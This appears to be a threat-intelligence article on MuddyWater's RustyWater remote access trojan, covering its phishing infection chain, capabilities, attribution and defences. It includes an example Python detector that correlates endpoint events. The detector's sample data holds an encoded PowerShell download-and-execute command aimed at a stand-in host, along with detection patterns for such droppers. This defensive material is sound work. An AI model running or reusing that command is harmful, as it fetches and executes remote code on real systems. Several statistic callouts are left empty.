
RustyWater RAT: MuddyWater Deploys New Rust Backdoor Targeting Middle East
Iranian APT group MuddyWater deploys RustyWater, a new RAT written in Rust, via sophisticated spear-phishing campaigns targeting government and energy sectors in the Middle East.
A Major Tactical Evolution
[Stat callout: increase in MuddyWater attacks since 2024]
The MuddyWater group, also known as Seedworm and TEMP.Zagros, marks a significant turning point in its arsenal with the deployment of RustyWater. This new Remote Access Trojan (RAT), entirely developed in Rust, represents a major evolution from the group's traditional tools, primarily based on PowerShell and Python.
Sophisticated Infection Chain
[Stat callout: share of initial infections via malicious Word documents]
The campaign uses highly targeted spear-phishing emails containing Word documents with obfuscated VBA macros. Once activated, these macros download and execute RustyWater in multiple stages to avoid detection.
Infection stages:
- Phishing email: Word document disguised as a government report
- VBA macro: execution of an encoded PowerShell dropper
- Download: retrieval of the RustyWater payload over HTTPS
- Persistence: creation of a registry Run key
- C2 communication: encrypted channel over TLS 1.3
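Each stage above leaves a separate trace in endpoint telemetry (an Office process spawning a script host, an encoded PowerShell command line, an outbound HTTPS connection to a young domain, a new Run key). Seen alone, each trace is noisy; seen together on one host within a short window they describe the chain. The following added example, which is not code from the article or from either vendor named in it, correlates constructed Sysmon-style events into stages and flags a host once several stages line up. The event layout, host names, domains, paths and the `domain_age_days` enrichment field are assumptions for illustration.

```python
import base64
import re
from collections import defaultdict

# Office parents and script hosts that, paired, indicate macro-driven execution.
OFFICE_PARENTS = {"WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Download primitives commonly seen in PowerShell droppers.
DOWNLOAD_PRIMITIVES = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.I)
NEW_DOMAIN_DAYS = 30  # domains registered within this window count as "recent" (assumption)


def _encode(ps):
    """Build a -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry: ws01 shows the full chain, ws02 only benign noise.
EVENTS = [
    {"host": "ws01", "type": "process", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand "
                + _encode("IEX (New-Object Net.WebClient).DownloadString('https://report-updates.example/stage')")},
    {"host": "ws01", "type": "network", "image": "powershell.exe",
     "dest": "report-updates.example", "port": 443, "domain_age_days": 4},
    {"host": "ws01", "type": "registry", "image": "powershell.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"host": "ws02", "type": "process", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand " + _encode("Get-Date")},
    {"host": "ws02", "type": "network", "image": "msedge.exe",
     "dest": "vendor-portal.example", "port": 443, "domain_age_days": 3650},
    {"host": "ws02", "type": "registry", "image": "setup.exe",
     "key": r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorAgent"},
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = re.search(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """Map one telemetry event to the infection stage(s) it evidences."""
    stages = set()
    if event["type"] == "process":
        if (event.get("parent", "").upper() in OFFICE_PARENTS
                and event["image"].lower() in SCRIPT_HOSTS):
            stages.add("macro_spawns_script_host")
        decoded = decode_encoded_command(event.get("cmdline", ""))
        if decoded and DOWNLOAD_PRIMITIVES.search(decoded):
            stages.add("encoded_dropper")
    elif event["type"] == "network":
        if event.get("port") == 443 and event.get("domain_age_days", 10**6) <= NEW_DOMAIN_DAYS:
            stages.add("download_from_new_domain")
    elif event["type"] == "registry":
        if RUN_KEY.search(event.get("key", "")):
            stages.add("run_key_persistence")
    return stages


def correlate(events):
    """Collect the distinct stages observed per host."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]] |= classify(ev)
    return {host: sorted(stages) for host, stages in per_host.items()}


def flag_hosts(events, min_stages=3):
    """Hosts on which at least min_stages distinct stages of the chain were seen."""
    return sorted(h for h, st in correlate(events).items() if len(st) >= min_stages)


if __name__ == "__main__":
    for host, stages in correlate(EVENTS).items():
        print(host, stages)
    print("flagged:", flag_hosts(EVENTS))
```

The threshold of three stages is a tuning knob: a lone Run key from an installer or a single encoded PowerShell command is normal on many fleets, while Office spawning a script host that decodes to a download primitive is already worth a ticket on its own. In a real pipeline the `domain_age_days` value would come from a passive DNS or registration-date enrichment rather than from the event itself.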
RustyWater Technical Capabilities
[Stat callout: number of distinct modules identified in the RAT]
RustyWater integrates advanced features that distinguish it from MuddyWater's previous tools:
Main features:
- Keylogging with periodic screenshot capture
- File exfiltration with automatic compression
- Command execution via shell and PowerShell
- Lateral movement via WMI and SMB
- AV evasion through process injection
Impact and Attribution
[Stat callout: confirmed compromised organizations across 6 countries]
Researchers from Trend Micro and Mandiant have confirmed attribution to MuddyWater with high confidence, based on:
- C2 infrastructure shared with previous campaigns
- Characteristic obfuscation techniques
- Victimology consistent with Iranian interests
Security Recommendations
To protect against RustyWater:
- Disable Office macros by default
- Implement behavioral EDR detection
- Monitor outbound connections to recently registered domains
- Block SHA256 hashes of identified samples
- Train users on advanced phishing techniques
Frequently Asked Questions
What is RustyWater?
RustyWater is a new Remote Access Trojan (RAT) developed in Rust by the Iranian APT group MuddyWater. It enables remote control of infected machines, including keylogging, data exfiltration, and command execution.
Who is behind the attacks?
The attacks are attributed to MuddyWater, an Iranian APT (Advanced Persistent Threat) group linked to the Ministry of Intelligence and Security (MOIS). Active since 2017, this group primarily targets government and energy organizations.
How does the infection work?
Infection begins with spear-phishing emails containing malicious Word documents. Obfuscated VBA macros then download the RustyWater payload, which installs itself and establishes a connection with the group's C2 servers.
Why was Rust chosen?
Rust offers several advantages: better performance, secure memory management that reduces crashes, and most importantly a different footprint than traditional malware that complicates signature-based antivirus detection.
How can organizations protect themselves?
Protection measures include: disable Office macros by default, deploy EDR solutions with behavioral detection, monitor outbound network traffic, apply known IoCs, and regularly train employees on advanced phishing techniques.